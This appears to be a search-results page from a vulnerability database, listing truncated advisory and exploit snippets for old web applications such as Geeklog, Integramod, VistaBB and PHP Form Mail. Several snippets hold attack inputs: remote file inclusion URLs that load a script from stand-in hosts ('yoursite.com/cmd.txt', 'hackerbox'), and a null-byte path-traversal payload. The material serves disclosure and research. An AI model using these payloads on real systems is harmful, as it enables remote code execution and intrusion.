214 matches found
DeluxeBB 1.3 - Multiple Vulnerabilities
DeluxeBB 1.3 - Multiple Vulnerabilities Author: cp77fk4r | Empty0pagEShift+2gmail.com Vendor: http://www.deluxebb.com Directory Listing http://server/templates/ http://server/images/ http://server/logs/ http://server/wysiwyg/ http://server/docs/ http://server/classes http://server/lang...
Geeklog 1.6.0sr1 - Arbitrary File Upload
============================================================================== Geeklog = v1.6.0sr1 - Remote Arbitrary File Upload Software Site: http://www.geeklog.net Dork: "By Geeklog" "Created this page in" +seconds +powered inurl:publichtml...
Geeklog 1.6.0sr1 File Upload
============================================================================== Geeklog with the URL of the Geeklog site. Opens an interactive browser session where you can create directories and upload files. This also exposes all the files in the images/Library/File|Image|Media|Flash directories...
JVN#80771386 Fulltext search CGI vulnerability allows third party to gain administrative privileges
Fulltext search CGI is a website search software from futomi's CGI Cafe. Fulltext search CGI contains a vulnerability that allows an attacker to gain administrative privileges. Impact A remote attacker could impersonate an administrator of fulltext search CGI. Solution Update the Software Update ...
RDP TLS downgrade
For those using TLS with Microsoft's Terminal server. With Terminal server installed on Windows 2003 Server with current service packs and patches it is possible to bypass the server side setting that requires SSL with a self-signed cert. You will automatically be downgraded to not using TLS and...
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
Actually, this can be pretty serious depending on server settings, but an improper example was given. Better one: jaxpetitionbook.php?languagepack=../../someotherallowedfileuploads/myfile.php.gif00 Many servers will have magic quotes on to defeat the null byte, but by no means all. John...
Easy File Sharing Web Server 4 - Remote Information Stealer
Easy File Sharing Web Server 4 - Remote Information Stealer / =================================================================== 0-day Alternative File Stream Exploit for Easy File Share Server 4 =================================================================== Exploit allows malicious users t...
integramodInclude.txt
--Security Report-- Advisory: Integramod Portal http://site/integramodpath/includes/functionsportal.php?phpbbrootpath=FILE EXAMPLE - http://site/integramodpath/includes/functionsportal.php?phpbbrootpath=http://yoursite.com/cmd.txt? EXAMPLE -...
vistabb2x.txt
--Security Report-- Advisory: VistaBB http://site/vistabbpath/includes/functionsmoduser.php?phpbbrootpath=FILE EXAMPLE - http://site/vistabbpath/includes/functionsmoduser.php?phpbbrootpath=http://yoursite.com/cmd.txt? EXAMPLE -...
[Full-disclosure] Advisory: Integramod Portal <= 2.x File Inclusion Vulnerability
--Security Report-- Advisory: Integramod Portal = 2.x File Inclusion Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/08/06 03:00 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: Integramod http://www.integramod.co...
Kerberos configuration
This plugin lets a user enter information about the Kerberos server that will be queried by some scripts SMB and SSH to log into the remote hosts. TRUSTED...
PHP Form Mail 2.3 Arbitrary File Inclusion
No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...
EmuLive Server4 - Authentication Bypass / Denial of Service
source: https://www.securityfocus.com/bid/11226/info Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions. An attacker may leverage...
Update Rollup 5 for Windows Server Solutions Best Practices Analyzer 1.0 is available
None None...